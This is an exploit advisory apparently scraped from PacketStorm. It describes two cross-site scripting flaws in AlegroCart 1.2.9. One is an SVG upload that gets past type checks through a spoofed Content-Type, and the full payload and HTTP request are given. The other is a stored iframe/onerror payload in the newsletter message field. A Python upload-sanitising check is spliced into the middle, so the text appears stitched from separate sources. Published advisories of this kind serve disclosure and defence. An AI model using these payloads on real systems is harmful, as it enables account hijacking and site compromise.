Source: https://sploitus.com/exploit?id=PACKETSTORM:190656
# Exploit Title: XSS via SVG Image Upload - alegrocartv1.2.9
# Date: 04/2025
# Exploit Author: Andrey Stoykov
# Version: 1.2.9
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

XSS via SVG Image Upload:

Steps to Reproduce:

1. Visit http://192.168.58.129/alegrocart/administrator/?controller=download
2. Upload an SVG image file with the contents below
3. Intercept the POST request and change the Content-Type to "Content-Type: image/jpg"
4. Then visit "http://192.168.58.129/alegrocart/download/xss.svg" to trigger the XSS
    
    
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
    <foreignObject width="100%" height="100%">
        <body xmlns="http://www.w3.org/1999/xhtml">
            <input type="text" onkeyup="prompt('XSS Triggered!')" placeholder="Type here..."/>
        </body>
    </foreignObject>
</svg>
    
    
// HTTP POST request

POST /alegrocart/administrator/?controller=download&action=insert HTTP/1.1
Host: 192.168.58.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
[...]

------geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
Content-Disposition: form-data; name="language[1][name]"

{{7*7}}
------geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
Content-Disposition: form-data; name="fileName"

xss.svg
------geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
Content-Disposition: form-data; name="download"; filename="xss.svg"
Content-Type: image/jpg

<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
    <foreignObject width="100%" height="100%">
        <body xmlns="http://www.w3.org/1999/xhtml">
            <input type="text" onkeyup="prompt('XSS Triggered!')" placeholder="Type here..."/>
        </body>
    </foreignObject>
</svg>
------geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
Content-Disposition: form-data; name="mask"

6760664742675684.svg
------geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
Content-Disposition: form-data; name="remaining"

1
------geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
Content-Disposition: form-data; name="79d45153379f999ff64e1198b05faae6"

586fdeeeaf42c0c557291be4d32afe11
------geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc--


// HTTP Response

HTTP/1.1 302 Found
Date: Thu, 03 Apr 2025 20:42:59 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Location: http://192.168.58.129/alegrocart/administrator/?controller=download
Cache-Control: max-age=0, private, no-store, no-cache, must-revalidate
Expires: Thu, 03 Apr 2025 20:42:59 GMT
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
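The upload above is accepted because the server trusts the client-supplied Content-Type (image/jpg) and later serves the file inline, where the browser renders the SVG and runs the onkeyup handler. As an added, defender-side example (not code from the advisory or from AlegroCart), the Python check below classifies the upload by its bytes, never by the declared type, and rejects SVGs that carry active content; PAYLOAD is a constructed copy of the SVG above, and the function names are this example's own.

```python
import xml.etree.ElementTree as ET

# Constructed copy of the advisory's SVG payload, used here as sample input.
PAYLOAD = (b'<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">'
           b'<foreignObject width="100%" height="100%">'
           b'<body xmlns="http://www.w3.org/1999/xhtml">'
           b'<input type="text" onkeyup="prompt(\'XSS Triggered!\')" placeholder="Type here..."/>'
           b'</body></foreignObject></svg>')

# SVG elements that embed HTML or run code when the file is rendered inline.
ACTIVE_TAGS = {"script", "foreignobject", "animate", "set"}

def local(name: str) -> str:  # strip the {namespace} prefix ElementTree adds
    return name.rsplit("}", 1)[-1].lower()

def sniff_kind(data: bytes) -> str:
    """Classify the bytes; the client-supplied Content-Type is never consulted."""
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if b"<svg" in data.lstrip()[:512].lower():
        return "svg"
    return "unknown"

def svg_active_content(data: bytes) -> list:
    """List every reason the SVG would execute script if served inline."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    reasons = []
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_TAGS:
            reasons.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = local(attr)
            if name.startswith("on"):                       # onkeyup, onload, ...
                reasons.append(f"{name} handler on <{tag}>")
            elif name == "href" and value.lstrip().lower().startswith("javascript:"):
                reasons.append(f"javascript: href on <{tag}>")
    return reasons

def check_upload(declared_type: str, data: bytes) -> dict:
    """Verdict for an upload; declared_type is recorded but never trusted."""
    kind = sniff_kind(data)
    reasons = (svg_active_content(data) if kind == "svg"
               else [] if kind == "jpeg" else ["not a recognised image format"])
    return {"declared": declared_type, "sniffed": kind,
            "reasons": reasons, "allowed": not reasons}
```

Even an SVG that passes this check should be served with Content-Disposition: attachment or from a separate origin, since the scan only catches the active-content markers it knows about.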
    
    
    
# Exploit Title: Stored XSS in "Message" Functionality - alegrocartv1.2.9
# Date: 04/2025
# Exploit Author: Andrey Stoykov
# Version: 1.2.9
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS #1:

Steps to Reproduce:

1. Log in as the demonstrator account and visit "Customers" > "Newsletter"
2. In "Message" use the following XSS payload

<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>